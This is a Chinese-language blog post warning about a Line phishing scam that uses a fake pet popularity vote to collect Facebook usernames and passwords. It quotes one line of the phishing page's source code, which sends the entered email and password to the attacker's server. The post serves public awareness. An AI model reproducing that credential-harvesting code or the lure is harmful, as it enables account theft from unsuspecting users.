文 / 小Mic
最近一些Line好友傳來這則訊息「朋友家狗狗參加人氣比拼,幫忙讚一下,感恩」,要你點網址去幫忙按讚,由於是好友,且投票網站乍看之下似乎很正常,所以很容易就相信。但明明臉書已經是登入狀態,按讚後還是要你輸入帳號密碼,就很有問題。從電腦連結該網址,檢查原始碼後發現,果然是釣魚網站,輸入帳號密碼恐怕帳號被盜。
Line好友傳來這則訊息,經確認非本人自願性傳送,應是Line帳號曾點到惡意連結導致自動傳送
投票網站乍看之下似乎很正常
但明明臉書已經是登入狀態,按讚之後還是要你輸入臉書帳號及密碼
手機上看不出異樣,以電腦連結該網址可以看到一個很陽春的網站
臉書已經是登入狀態,按讚後還是跳出輸入臉書帳密視窗
在輸入帳密視窗按右鍵 → 顯示為分頁
此時輸入帳密視窗展開為分頁
檢視原始碼
看到這串回傳物件語法,帳號及密碼輸入後則回傳到伺服器(此時帳號被盜)
document.location = "ashx/login.ashx?email=" + email + "&pass=" + pass;
document.location 為回傳文件的 location 物件 (object) 語法
其他可疑之處
此網站看起來很陽春,沒有任何網站宣告
而且按讚數全都是0(假網頁)
而且按讚數全都是0(假網頁)
愛貓愛狗人士請小心!
延伸閱讀:
「15歲少女在Facebook上露胸後自殺」小心帳號成為病毒推手
Line免費貼圖?當心個資外洩!
1 則留言 :
新手還是不懂怎麼看被盜 平板也沒有檢視原始碼功能 謝謝分享
張貼留言